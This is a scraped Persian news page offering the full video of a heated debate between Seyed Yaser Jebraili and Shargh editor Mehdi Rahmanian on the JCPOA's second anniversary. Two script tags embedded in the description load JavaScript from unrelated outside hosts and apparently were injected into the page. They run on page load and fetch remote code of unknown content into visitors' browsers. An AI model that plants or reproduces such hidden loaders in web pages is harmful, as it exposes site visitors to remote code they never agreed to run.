مناظره کامل و جنجالی جبرائیلی با رحمانیان، مدیرمسئول روزنامه شرق!!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>فیلم کامل مناظره سید یاسر جبرائیلی با مهدی رحمانیان مدیرمسئول روزنامه شرق در دومین سالگرد برجام که بیانیه اعتراضی وزارت خارجه را به دنبال داشت!<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
148

- 
13

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)